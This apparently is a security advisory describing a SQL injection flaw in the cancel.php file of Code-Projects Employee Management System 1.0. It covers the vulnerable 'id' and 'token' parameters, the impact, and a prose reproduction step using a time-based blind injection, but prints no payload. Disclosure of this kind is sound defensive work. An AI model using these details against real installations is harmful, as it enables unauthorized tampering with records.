Code-Projects Employee Management System SQL Injection Vulnerability in Cancel.php

A SQL injection vulnerability has been identified in Code-Projects Employee Management System version 1.0. The issue resides in the file '370project/cancel.php', where user-controlled parameters 'id' and 'token' are concatenated into an SQL 'UPDATE' statement without proper parameterization. This vulnerability can be exploited remotely and has been publicly disclosed.

Impact

Exploitation of this vulnerability allows attackers to manipulate leave-request statuses, potentially causing unauthorized cancellations. Additionally, the vulnerability could be used to infer database behavior or data through blind SQL injection techniques. Exploitation may also degrade application performance by causing time delays or triggering resource-intensive database operations.

Reproduction

To reproduce this vulnerability, send a GET request to 'cancel.php' with the 'id' and 'token' parameters. The 'id' parameter can be replaced with a crafted payload that exploits the SQL injection vulnerability, such as a time-based blind SQL injection payload that, when executed, introduces a noticeable delay in the response time. The injection takes place during the execution of an SQL 'UPDATE' statement, where the vulnerable parameters are not properly sanitized before being used in the database query.